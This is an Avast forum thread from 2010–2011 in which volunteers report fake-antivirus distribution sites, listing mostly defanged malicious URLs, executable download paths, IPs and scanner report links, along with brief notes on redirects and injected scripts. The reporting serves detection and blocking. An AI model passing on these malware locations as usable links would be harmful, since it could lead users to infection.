Avast WEBforum
Other => Viruses and worms => Topic started by: polonus on June 04, 2010, 09:37:53 PM
-
Hi malware fighters,
Fake-av found here:
Here is a complete list:
Threat Name: Trojan.FakeAV!gen24
Location: htxp://052a55.topwestsecure.com/download/DistAV_2013_b8.exe
Threat Name: Trojan.FakeAV!gen24
Location: htxp://f1e0c0.topwestsecure.com/download/DistAV_2013_b7.exe
Re: http://www.virustotal.com/analisis/f8ae332e594ad0ac2dcec58a9f3ad0f831b6d62ee4c0e0300d8df81e8548adde-1275605281
See: htxp://jsunpack.jeek.org/dec/go?report=8b7aed3a9e6d72e4b11f28a3673cc682296b3d54
Threat Name: Trojan.FakeAV!gen24
Location: htxp://ba38c4.topwestsecure.com/download/DistAV_2013_b8.exe
http://www.prevx.com/filenames/975799710197341493-X1/DISTAV_2013_B8%5B1%5D.EXE.html
See: http://www.browserdefender.com/site/topwestsecure.com/
Trend Micro: This URL is currently listed as malicious.
polonus
-
thank you for detail information, detection and URL block will be in next VPS update
-
Hi malware fighters,
Another Polish fake av spreading site: shamanshop*pl
5 instances of it being found up: #
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://shamanshop.pl/sklep/blog/nate+berkus+show.html
#
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://shamanshop.pl/sklep/blog/danny+aiello.html
#
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://shamanshop.pl/sklep/blog/hostmonster.html
#
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://shamanshop.pl/sklep/blog/david+gallagher.html
#
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://shamanshop.pl/sklep/blog/snapgrades+login.html
Two redirects found there: 302 -> htxp://shamanshop.pl/sklep
301 -> hxtp://shamanshop.pl/sklep/
redirecting scheme: htxp://shamanshop.pl/ redirects to hxtp://shamanshop.pl/sklep
htxp://shamanshop.pl/sklep redirects to htxp://shamanshop.pl/sklep/
polonus
-
Another one here:
HTTP Fake AV Redirect Request
Location: htxp://mygoodoldwebsite.com/ezsee.php?t=gabe%20saporta%20arrested
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://mygoodoldwebsite.com/ezsee.php?t=summer%20jam%202010%20denver
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://mygoodoldwebsite.com/ezsee.php?t=mtv%20music%20awards%202010
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://mygoodoldwebsite.com/ezsee.php?t=dean%20s%20blue%20hole
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://mygoodoldwebsite.com/ezsee.php?t=blossom%20music%20center%20website
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://mygoodoldwebsite.com/ezsee.php?t=ken%20jeong%20wiki
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://mygoodoldwebsite.com/ezsee.php?t=us%20open%20tennis%202010%20ticket%20prices
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://mygoodoldwebsite.com/ezsee.php?t=blank%20check
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://mygoodoldwebsite.com/ezsee.php?t=wakeboard%20sizing
Threat Name: HTTP Fake AV Redirect Request
Location: http://mygoodoldwebsite.com/ezsee.php?t=uncle%20phil%20shredder
polonus
-
Hi malware fighters, another fake AV redirecting site to include..
2010-06-12 23:14:18 (GMT 1)
Website schuiling*net
Domain Hash 9c082f0a211d3fc7877cc13d7742c219
IP Address 69.89.22.118
IP Hostname box118.bluehost.com
IP Country US (United States)
AS Number 11798
AS Name BLUEHOST-AS - Bluehost Inc.
Detections 2 / 20 (10 %)
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=peruvian%20prisons
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=prop%2016%20polling
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=puzzle%20pirates%20forums
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=realm%20status%20addon
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=robert%20mutt%20lange%20and%20marie-anne%20thiebaud
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=strasburg
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://schuiling.net/qamju.php?on=taboo%20black%20eyed%20peas%20son
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=us%20open%20tennis%202010%20american%20express
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=virtual%20retinal%20display%20pdf
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://schuiling.net/qamju.php?on=world%20cup%20brackets
presents us with a double redirect, after a failure: <urlopen error no host given>
STATUS suspicious...
polonus
-
As always, good work, D. !!
Thanks, friend..!
asyn
-
The Fake scanner is gone, the redirect goes to CNN...... ???
-
And another recent one with 55 threats found,
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=hood%20county%20texas%20tax%20assessor
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=indiana%20unclaimed%20property%20act
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=indiana%20unclaimed%20property%20law
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=iphone%204%20verizon%20release%20date
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=jaleel%20white%20death
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=liberty%20bell%20facts
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=libertybellbank.com
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=lil%20boosie%20death%20penalty
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=mario%20treadway%20aka%20mc%20souleye
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://skepticalatheist.com/luwhp.php?on=mlb%20draft%202010%20rankings
polonus
-
Will also send you to CNN ..... :-\ ???
-
Will also send you to CNN ..... :-\ ???
CNN, the new haven of malware..?? ;D
asyn
-
Well Pondus,
I was re-directed there twice going through the request in malzilla, well here is yesterday's score:
2010/06/11_07:42 firtullgone.com/uy/avs.exe 95.211.29.19 hosted-by.leaseweb.com. fake av Broupun Banker () / bofjosorupATmaila.com 16265
2010/06/11_07:42 wXw.fast-scanneronline.org/installer.0022.exe 91.188.60.3 - fake av Irving Roberson / robersonAThotmail.com 6851
This site is dangerous at 9 counts: http://www.urlvoid.com/scan/fast-scanneronline.org
2010/06/06_21:09 hibatavay.cn/pr.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
2010/06/06_21:09 core2979.hibatavay.cn/d_advare_all.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
2010/06/06_21:09 wXw.beautifulsecurityscan.com/ms03/ad 91.212.127.19 - fake av Robert Watkins robertwatkinsAThotmailbox.com 49087
2010/06/06_16:37 core2979.mylivejournalchanel.com/stget2.cgi?host=host&id=2979 173.212.245.90 173-212-245-90.hostnoc.net. fake av contactATprivacyprotect.org 21788
2010/06/06_16:37 core2979.davirijan.cn/d_advare_all.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
pol
-
Will also send you to CNN ..... :-\ ???
CNN, the new haven of malware..?? ;D
asyn
Maybe malware news .... ;D
-
Well Pondus,
I was re-directed there twice going through the request in malzilla, well here is yesterday's score:
2010/06/11_07:42 firtullgone.com/uy/avs.exe 95.211.29.19 hosted-by.leaseweb.com. fake av Broupun Banker () / bofjosorupATmaila.com 16265
2010/06/11_07:42 wXw.fast-scanneronline.org/installer.0022.exe 91.188.60.3 - fake av Irving Roberson / robersonAThotmail.com 6851
This site is dangerous at 9 counts: http://www.urlvoid.com/scan/fast-scanneronline.org
2010/06/06_21:09 hibatavay.cn/pr.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
2010/06/06_21:09 core2979.hibatavay.cn/d_advare_all.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
2010/06/06_21:09 wXw.beautifulsecurityscan.com/ms03/ad 91.212.127.19 - fake av Robert Watkins robertwatkinsAThotmailbox.com 49087
2010/06/06_16:37 core2979.mylivejournalchanel.com/stget2.cgi?host=host&id=2979 173.212.245.90 173-212-245-90.hostnoc.net. fake av contactATprivacyprotect.org 21788
2010/06/06_16:37 core2979.davirijan.cn/d_advare_all.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
pol
jepp. those contained malware. Already collected and submited ...... ;)
-
Maybe malware news .... ;D
Would be news worth to watch..! ;D
asyn
-
Hi Asyn,
This is the latest malware craze infected CNN adbanner code ;D
This all in fun, but it is a reality that no code is left alone by the malcreants to scheme another obfuscated injection scheme, the Internet is becoming a scary place for webmaster that want to keep their website's code clean,
polonus
-
...the Internet is becoming a scary place for webmaster that want to keep their website's code clean,
I know that only too well. ;)
asyn
-
Hi malware fighters,
Another one reported here:
Website westernwinds.net
Domain Hash f75afbc2b730096197625b5e49c7a496
IP Address 66.96.130.112 [SCAN]
IP Hostname 112.130.96.66.static.eigbox.net
IP Country US (United States)
AS Number 29873
AS Name BIZLAND-SD - The Endurance International Grou...
Detections 2 / 18 (11 %)
Status SUSPICIOUS
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://westernwinds.net/fevcf.php?topic=obama%20address%20to%20students%20transcript
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://westernwinds.net/fevcf.php?topic=pic%20hunter
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://westernwinds.net/fevcf.php?topic=rick%20rubin%20myspace
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://westernwinds.net/fevcf.php?topic=san%20diego%20union%20tribune%20crossword
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://westernwinds.net/fevcf.php?topic=san%20diego%20union%20tribune%20newspaper
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://westernwinds.net/fevcf.php?topic=spirit%20airline%20strike
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://westernwinds.net/fevcf.php?topic=svk
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://westernwinds.net/fevcf.php?topic=swype%20for%20iphone
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://westernwinds.net/fevcf.php?topic=tony%20award%20winners%202009
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://westernwinds.net/fevcf.php?topic=watch%20true%20blood%20online%20for%20free%20streaming
Redirecting to cnn.com again
Here is where it happens info: [decodingLevel=1] found JavaScript
error: line:4: SyntaxError: missing ] after element list:
error: line:4: [native code]
error: line:4: ................^
polonus
-
Hi malware fighters,
A recent list from Malware Domain List for fake av:
http://www.malwaredomainlist.com/mdl.php?search=fake+av&colsearch=All&quantity=50
One example given in here: spinpoll.com/iuqdx/qttbbm.php?ff=826284
results
http://scanner.novirusthanks.org/analysis/561d310ada76abefafa70c2afb1f7a10/cXR0YmJtLnBocA==/
http://wepawet.iseclab.org/view.php?hash=0372e8bf9a1d75e118b18830d4ea85fb&t=1276780197&type=js
Triggered code has been made unobtrusive and is legit here,
but the ways in which it can be exploited are obvious,
read: http://www.alstevens.co.uk/a-less-obtrusive-google-analytics-script/
How it recently was exploited read here: http://blog.unmaskparasites.com/2009/03/26/google-analytics-is-an-intermediary-in-malware-distribution/
polonus
-
Hi malware fighters,
Here is a report about the way the malware is being injected via cross site scripting:
http://cyberinsecure.com/high-ranking-websites-spread-malware-through-cross-site-scripting-vulnerabilities/
It’s embedding iframes to redirect and [=/quote]The last chunk of test is hexadecimal-encoded HTML that redirects users to ask5.eu (do not visit, see: http://www.siteadvisor.com/sites/ask5.eu ), and 1 suspicious inline script found, for this script see: http://jsunpack.jeek.org/dec/go?report=b413e5b967fa38a1d2dea332d601417ac034c41d with a undefined function parent.location.replace
to an apparent pr0n site...
A series of redirect links ultimately leads to a site that looks similar to a Microsoft Windows screen with a popup claiming the PC is overrun with malware. The user is prompted to download rogue anti-virus to fix the imaginary problem.
While it’s not the most convincing attack we’ve ever seen, there’s nothing to stop attackers from using the same technique to push web-based exploits, say the Adobe Reader zero-day attack that’s now circulating in the wild.
The links work because appleinsider.com and the rest of the sites being abused fail to filter out harmful characters used in XSS attacks. Here are a few examples with some of the malicious XSS advertisements (do not follow these or other “hxxp” URLs below): http://cyberinsecure.com/wp-content/uploads/2009/12/xss.png (click to enlarge)
[=/quote]
polonus
-
Fake AV,
A good read-up on the subject can be found here: http://www.usenix.org/event/leet10/tech/full_papers/Rajab.pdf
(advized by Google coders)
polonus
-
Hi malware fighters,
Another fake av site detected: versusspywareguard.com
Threat Name: HTTP Fake Antivirus WebPage Request 2
Location: htxp://6de46b37e.versusspywareguard.com/stream1/cacnpr/fhlcnalhnd/fcllfmfhdl.html
Threat Name: HTTP Fake Antivirus WebPage Request 2
Location: htxp://0639945.versusspywareguard.com/stream1/cafm/phddqcmrcc/fcllfmfral.html
Another source to look at from secubox labs: http://internetpol.fr/mw/
polonus
-
Hi malware fighters,
Another fake av site:rodaco.org
Domain Hash 94f43071befdbcaf02482e09e2a7a3ef
IP Address 66.96.131.89 [SCAN]
IP Hostname 89.131.96.66.static.eigbox.net
IP Country US (United States)
AS Number 29873
AS Name BIZLAND-SD - The Endurance International Group
:
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://rodaco.org/vlruf.php?pageid=april%20fools%20day%20history
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://rodaco.org/vlruf.php?pageid=auhsd
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://rodaco.org/vlruf.php?pageid=cesar%20chavez%20biography
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://rodaco.org/vlruf.php?pageid=fledgling%20foundation
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://rodaco.org/vlruf.php?pageid=siohvaughn%20wade%20std
polonus
-
Hi malware fighters,
And another one of the fake av drive-by-downloads detected here:
Threats found: 6
Here is a complete list:
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://angrystot.com/press/?showc=7+11+locator
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://angrystot.com/press/?showc=anthony+morrow
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://angrystot.com/press/?showc=dani+jarque
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://angrystot.com/press/?showc=dream+15
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://angrystot.com/press/?showc=flugtag
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://angrystot.com/press/?showc=gary+air+show
polonus
-
Hi malware fighters,
Another one from Moldova:
Threats found: 58
Here a sample of them:
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=baby-shower-4u.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3D%EF%BB%BFThe%2BTwilight%2BSaga%3A%2BEclipse
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=bluehillsmoto.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3D%EF%BB%BFThe%2BTwilight%2BSaga%3A%2BEclipse
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=comnicity.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3D%EF%BB%BFThe%2BTwilight%2BSaga%3A%2BEclipse
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=donsrcmodels.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3D%EF%BB%BFThe%2BTwilight%2BSaga%3A%2BEclipse
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=earlsauction.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3D%EF%BB%BFThe%2BTwilight%2BSaga%3A%2BEclipse
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=helix-x.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3D%EF%BB%BFThe%2BTwilight%2BSaga%3A%2BEclipse
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=kalpulli.org&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3D%EF%BB%BFThe%2BTwilight%2BSaga%3A%2BEclipse
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=kwzone.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3D%EF%BB%BFThe%2BTwilight%2BSaga%3A%2BEclipse
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=kwzone.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Declipse%2Bpremiere
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://lariska12.osa.pl/in.php?t=cc&d=30-06-2010_t_0107_08&h=marylandvisiontherapy.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fnum%3D100%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Declipse%2Bpremiere
Virus
Threats found: 1 Analyzed this trojan further below...
Here is a complete list:
Threat Name: Downloader avast detects as Win32:Downloader-ECU now as Win32:Downloader-ECU [Trj]
Location: htxp://zhengshu.osa.pl/zhengshu/zhengshuw.exe (other file is zhengshu.exe)
Infected with Mal/Downldr-AL
经过扫描,其中 0/6 款杀毒软件检测到zhengshuw[1].exe 含有病毒木马及可疑风险! ... 文件百科提供的内容不够完善?立即去论坛讨论zhengshuw[1].exe >>
htxp://58.251.57.206/down?cid=3D228BFFBDF06C63A04E66BA3D14FB880FE1E892&t=2&fmt=&usrinput=%E6%9A%B4%E9%A3%8E%E5%BD%B1%E9%9F%B3&dt=2018000&ps=0_0&rt=0kbs&plt=0&spd=9
Is in this list: http://malwarepatrol.com.br/cgi/submit?action=list_mcf
http://www.prevx.com/filenames/719191126558992567-X1/ZHENGSHU.EXE.html
and
http://scanner.novirusthanks.org/analysis/35d82b779d33dd59129769d614465b86/emhlbmdzaHV3LmV4ZQ==/
See: http://wepawet.iseclab.org/view.php?hash=40910560e9eb16905f511b33a1355c7f&t=1279382964&type=js
and
http://www.virustotal.com/analisis/9469a349c50038c798801a0ba64d42f5e8c699c62a37c3d06f23db905e848018-1279279124
pol
-
Hi malware fighters,
Drive-By Downloads
Threats found: 25
Here is a sample:
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://barbolafuneralchapel.com/cbyrt.php?off=roy%20williams%20youtube
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://barbolafuneralchapel.com/cbyrt.php?off=s1%20homes
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://barbolafuneralchapel.com/cbyrt.php?off=schnepf%20farms%20twitter
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://barbolafuneralchapel.com/cbyrt.php?off=sertraline%20and%20alcohol
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://barbolafuneralchapel.com/cbyrt.php?off=shukufuku%20no%20campanella%20ep%201
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://barbolafuneralchapel.com/cbyrt.php?off=shukufuku%20no%20campanella%20tv
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://barbolafuneralchapel.com/cbyrt.php?off=stella%20marie%20ray
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://barbolafuneralchapel.com/cbyrt.php?off=watch%20one%20piece
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://barbolafuneralchapel.com/cbyrt.php?off=world%20cup%20finals
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://barbolafuneralchapel.com/cbyrt.php?off=www.applegiftgiveaway.info
Might have been removed!
polonus
-
Hi malware fighters,
Another one here: Threats found: 1
Here is a complete list:
Threat Name: Trojan.FakeAV
Location: htxp://trafok.in/modulesetup70700.exe
A dangerous website according to several sources: http://www.urlvoid.com/scan/trafok.in
Mazilla found this:
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
With the avast shield that gave a JS:ScriptDC-inf[Trj] warning for a malware download,
And another one here:
hreat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=charlie%20wilsons%20war%20wiki
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=cydia%20ipad
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=dickssportinggoods%20application
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=endhiran%20trailer
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=jailbreakme%202010
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=kristen%20mcmenamy%20gray%20hair
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=mitzi%20kapture%20imdb
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=mitzi%20kapture%20movies
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=the%20joe%20schmo%20show
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://utu974.com/sgfsj.php?on=yani%20tseng%20caddie
See: http://www.urlvoid.com/scan/utu974.com
polonus
-
VirusTotal - modulesetup70700.exe - 11/42
http://www.virustotal.com/analisis/ef3df69693dc5906ee2b88e4ae134ff74eeb99298d19c27bde9367ef05cf8260-1281125582
and it is already in avast inbox..... ;)
-
Hi malware fighters,
Another one here:
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://wisneski.net/woaoc.php?a=care%20credit%20providers
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://wisneski.net/woaoc.php?a=dickssportinggoods%20in%20store%20coupons
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://wisneski.net/woaoc.php?a=ernesto%20miranda%20grave
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://wisneski.net/woaoc.php?a=hansen%20clarke%20michigan
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://wisneski.net/woaoc.php?a=haskell%20invitational%20monmouth%20park
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://wisneski.net/woaoc.php?a=mine%20lyrics
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://wisneski.net/woaoc.php?a=quintuplets%20blog
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://wisneski.net/woaoc.php?a=quintuplets%20dionne
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://wisneski.net/woaoc.php?a=santa%20monica%20college%20nursing
Threat Name: HTTP Fake AV Redirect Request
Location: hxtp://wisneski.net/woaoc.php?a=unigo%20emory
Re: http://www.urlvoid.com/scan/wisneski.net
polonus
-
One more for your collection:
fotonpl.co.cc/a/exe.exe
-
The family form the above post:
fotonpl.co.cc/a/l.php
-
Hi malware fighters,
Another fake av detected here: Threat Name: Trojan.FakeAV avast detects as Win32:Trojan-gen
Location: htxp://abodeflash-vol33.co.tv/om/ms.php
The site is infested with Mal/FakeAV-CX
Re: http://www.threatexpert.com/report.aspx?md5=57b1187f07968de0f2e203b70d972c5f
Chinese security info on this malcode: http://www.antivirus365.org/PCAntivirus/14112.html
http://vscan.urlvoid.com/analysis/670d26f0bda43fba8d3bdbf7f3442ffa/bXMtcGhw/
polonus
-
Hi another fake-av here:
Total threats found: Drive-By Downloads
Threats found: 27
e.g.
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=seamless%20web%20backgrounds
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=sean%20foley%20swing%20coach
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=showboat%20texas%20city
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=sonoma%20state%20university%20jobs
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=superhead%20video%20vixen%20book
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=ted%20stevens%20international%20airport
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=ted%20stevens%20wiki
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=trevor%20ariza%20nba
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=true%20blood%20season%203%20episode%208%20megavideo
Threat Name: HTTP Fake AV Redirect Request
Location: htxp://alamito.com/swwrz.php?m=west%20end%20shows
polonus
-
Detected e.g.: htxp://trafficplaza.co.uk/images/images/media/msg=8044.html
infected with JS/Tenia.b
and 366 other threats on mentioned domain:
See: http://www.virustotal.com/url-scan/report.html?id=3a6bb172f4a466cd37ef42c6fb8b827d-1300468922
See: http://www.virustotal.com/file-scan/report.html?id=9b11d70c2b1fccb35ad61f79529a2696a06f1d4b86cf1575c59ea3a78ef3a40f-1300472576
Unmasked parasites gives: Last time suspicious content has been found at this site, was on 2011-03-15.
Malicious software includes 8 scripting exploits.
This generic detection covers obfuscated scripts in which malicious iFrames is appended to the end of a HTML page, i.e. after the < /HTML > tag.
Malicious software has been hosted on 1 domain, e.g. clint-eastwood dot cn/.
This site was hosted on 1 network including AS29671 (SERVAGE),
computer symptoms upon infection are:
Unexpected connection to the unsafe domains frequently,
New added Registry keys files detailed or Registry modification,
System always crash for no man-made reason at all,
The memory of your System reduces unusually,
polonus
-
This one is not being detected, see over one hundred instances of Fake AV Website 5,
see: http://safeweb.norton.com/report/show?name=kylesheart.com
scanned this one at virustotal: htxp://kylesheart.com/zcobm.php?on=tekstovi%20pjesama
accompanying file scan: http://www.virustotal.com/file-scan/report.html?id=674faded451ce38bea28854cb4b4eb3790cd728dcc02b4eff07e181e9f511b68-1301086476
also see: http://safeweb.norton.com/buzz
polonus
-
Hi folks,
Another fake-av not detected by avast, resides here: htxp://ksu-antispyware.co.cc/fast-scan/
Detected here: http://www.virustotal.com/url-scan/report.html?id=7069774e14deabae6eaade4b11b85163-1302459072
file analysis, 3/ 42 (7.1%)
http://www.virustotal.com/file-scan/report.html?id=4536e20094bf07f94b28f9892997ea339387fb3fc4e0713e50c8793c0f873caf-1302466596
See Wepawet analysis: benign, but has a big hunk of obfuscated code,
ksu-antispyware.co.cc/fast-scan/
This online html scrambler obfuscater was being used: http://www.voormedia.com/en/tools/html-obfuscate-scrambler.php
polonus
-
Hi folks,
Further info on: htxp://ksu-antispyware.co.cc/fast-scan/
Initially most likely "TROJAN.HTML.FRAUD!IK" will not appear because it is in IE temp. location,
but it will reveal itself with the proper cleansing routine...
Detected here by both Emisift and Ikarus, see: http://vscan.urlvoid.com/analysis/b76bcbe66e85fda63615359905b06bdc/ZmFzdC1zY2Fu/
Site is blacklisted here: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ksu-antispyware.co.cc
and here as infected with Fake App Attack: Fake AV Notification Alert:
http://safeweb.norton.com/report/show?url=ksu-antispyware.co.cc
pol
-
See this analysis,
Suspicious: http://wepawet.iseclab.org/view.php?hash=d04433f971bfd8deefd0b9219a9a5c49&t=1302716752&type=js
Anubis report: http://anubis.iseclab.org/?action=result&task_id=1e848af371b5bec44a91fe827a1c5df39
See: http://www.virustotal.com/url-scan/report.html?id=91c838a06b3f196fa77983e640fd5b8b-1302716668
Not detected: http://www.virustotal.com/file-scan/report.html?id=cd9231daff32df82fb1894655cec052f20da2d5fe5d7e3a9c91ecc9160dc0d86-1302723871
polonus
-
New variants for the Antispy2011setup.exe
htxp://protectinstallxpvirusnow.com
htxp://protectxpscanvirus.com
Both are redirected from ads and Avast does not detect them. ran into it twice on 2 seperate websites
-
I get a 404 on both of those...
Do you have the files, to add to the chest and send to avast?
-
The sites may have been brought down or changed.
When i got redirected to the site i got a prompt if i want to run or save Antispy2011setup.exe after it did the fake virus scan.
-
Exactly, and it is that file that is necessary for avast to get so that they can detect it...
Yes, blocking the site is all well and good, but give it a few hours and they have most likely moved on...but without the install file for this rogue, how will it be detected...
-
Exactly, and it is that file that is necessary for avast to get so that they can detect it...
Yes, blocking the site is all well and good, but give it a few hours and they have most likely moved on...but without the install file for this rogue, how will it be detected...
